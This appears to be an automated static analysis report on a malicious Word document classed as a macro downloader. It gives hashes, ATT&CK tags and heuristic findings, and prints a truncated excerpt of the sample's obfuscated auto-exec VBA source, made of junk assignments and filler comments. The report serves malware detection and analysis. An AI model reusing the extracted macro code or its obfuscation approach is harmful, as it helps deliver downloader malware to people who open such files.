Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1890f1cf7ef183cd…

MALICIOUS

Office (OLE)

Size: 281.5 KB
Created: 2019-10-11 06:46:00
Authoring application: Microsoft Office Word
First seen: 2020-05-25
MD5: 639efc02c91bdd97576fa622da9b0f13
SHA-1: ea7eacd47862d74d59c61218f03c3efbb8ad4bce
SHA-256: 1890f1cf7ef183cdbe29746f03497b10620876cac3bbc2cb7ff87a7cc59d66cb
Risk Score: 282

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment

The sample contains obfuscated VBA macros, including an AutoOpen function, which are designed to execute automatically upon opening. Heuristics indicate the use of GetObject and execution tokens, suggesting the macro attempts to download and run a secondary payload. ClamAV detection further confirms its malicious nature as a downloader.

Heuristics 8

  • ClamAV: Doc.Downloader.Generic-7329510-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-7329510-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 83032 bytes
SHA-256: 034a7563a4e4bc0cbe6d2c987c433feef4fa201264df6db6485df67c848d127c

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "c0700907660"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "b19x7x45090, 0, 0, MSForms, TextBox"
Attribute VB_Control = "b06281x0603, 1, 1, MSForms, TextBox"
Attribute VB_Control = "x0c80941695x, 2, 2, MSForms, TextBox"
Attribute VB_Control = "x860052b300, 3, 3, MSForms, TextBox"
Attribute VB_Control = "cx0102cb058, 4, 4, MSForms, TextBox"
Attribute VB_Control = "c3007b6403930, 5, 5, MSForms, TextBox"

Attribute VB_Name = "b270861x0570"
Function cb123x4531b7()
On Error Resume Next
   'Future082 Legros Coves, Altatown, New Caledonia Central726 Kertzmann Trail, Lake Weldon, Nauru
c40604669229 = Rnd(c0203c2xb705 * ChrB(434)) + Log(233)
'Customer3843 O'Conner Track, Jodyhaven, Pitcairn Islands Regional29224 Parker Via, North Estefania, Norway
b29b03045070 = Rnd(c3438728x510 * ChrB(404)) + Log(453)
'Investor14301 Upton Parks, Ovashire, Nauru Corporate3810 Gerardo Fall, New Keven, Christmas Island
x36270c561996 = Rnd(x140019c8012 * ChrB(218)) + Log(862)
'Central858 Chris Track, Connellyberg, Macao Chief6017 Jackie View, Whiteview, French Southern Territories
x0110bc4234 = Rnd(c170b0191004 * ChrB(321)) + Log(585)
'Legacy3963 Walker Pine, Leanneland, Seychelles Investor3367 Carson Rapids, Quigleyside, Brunei Darussalam
x05484c23666 = Rnd(c0b45000b0c * ChrB(181)) + Log(626)
'Product062 Michelle Park, East Lilyan, Congo Lead84818 Stehr Stream, Sauerside, Kiribati
bxb103506000 = Rnd(b0x36900296 * ChrB(713)) + Log(6)
'Product6945 Mazie Expressway, Lockmanmouth, United States Minor Outlying Islands Direct440 Kuhlman Isle, Port Akeemfurt, Republic of Korea
c206230721291 = Rnd(xbc8774xx687 * ChrB(578)) + Log(902)
'Customer34809 O'Keefe Path, West Sethchester, Cape Verde Principal02250 Rau Burg, Romagueramouth, Greece
'International98166 Evalyn Flats, Lake Lilla, Kyrgyz Republic Lead817 Brakus Place, Andreannetown, Nicaragua
c390508028407 = Rnd(c82075c602222 * ChrB(646)) + Log(356)
'Direct2424 Gutkowski Radial, Port Agnes, Honduras Principal85418 Emard Plaza, Lake Paula, Guinea-Bissau
b040607090860 = Rnd(cxc32038027 * ChrB(694)) + Log(426)
'District51991 Eloy Spring, Port Patience, British Indian Ocean Territory (Chagos Archipelago) Regional67848 Thaddeus Forks, Carrollborough, Syrian Arab Republic
c164x3x86990c = Rnd(x004b972b05b * ChrB(192)) + Log(567)
'Internal0776 Pink Oval, Lake Brenden, Saudi Arabia Senior835 Gusikowski Shoals, Breitenbergchester, Burkina Faso
b70b0b64265 = Rnd(x256bb980319 * ChrB(125)) + Log(430)
'District0129 Haley Spur, Zboncakmouth, Ethiopia Future9710 Lang Orchard, Strackestad, Antarctica (the territory South of 60 deg S)
c457196xb09 = Rnd(x78407c40833x * ChrB(376)) + Log(388)
'Global6924 Anissa Lakes, Wizaton, Pakistan Human599 Renner Manor, New Cierra, Cayman Islands
b2930x600019 = Rnd(x90038x202b * ChrB(630)) + Log(220)
'Dynamic0673 Karson Divide, Walterland, Namibia Future39801 Lesch Meadows, North Howellmouth, Malaysia
c0c11cb50x479 = Rnd(c580c2006790 * ChrB(707)) + Log(398)
'Dynamic714 Zoey Light, Altenwerthton, Bhutan Chief878 Stracke Inlet, New Russmouth, Palau
   'District2140 Leonel Circle, Morarfort, Iceland Lead992 Darrick Station, Duaneton, Pitcairn Islands
c860x07064b = Rnd(c00000461673 * ChrB(907)) + Log(54)
'Forward7390 Green Forges, Jacobsshire, Taiwan Forward477 Friesen Mountains, East Lilliana, United Arab Emirates
b800b030590c0 = Rnd(c90x30c06bc * ChrB(286)) + Log(65)
'International347 Roberts Mount, Port Jessborough, Austria Senior91358 Bode Ford, South Ebonytown, Palau
bb048103660b = Rnd(bb080011003b0 * ChrB(25)) + Log(543)
'Lead010 Alexander Turnpike, Nienowview, Azerbaijan Global66413 Kub Island, Manteton, Guyana
b005923065050 = Rnd(c0xb9074c34 * ChrB(610)) + Log(657)
'Principal097 Gustave Causeway, North Caspershire, Timor-Leste Human6610 Bradtke Stravenue, Hellertown, Montse
... (truncated)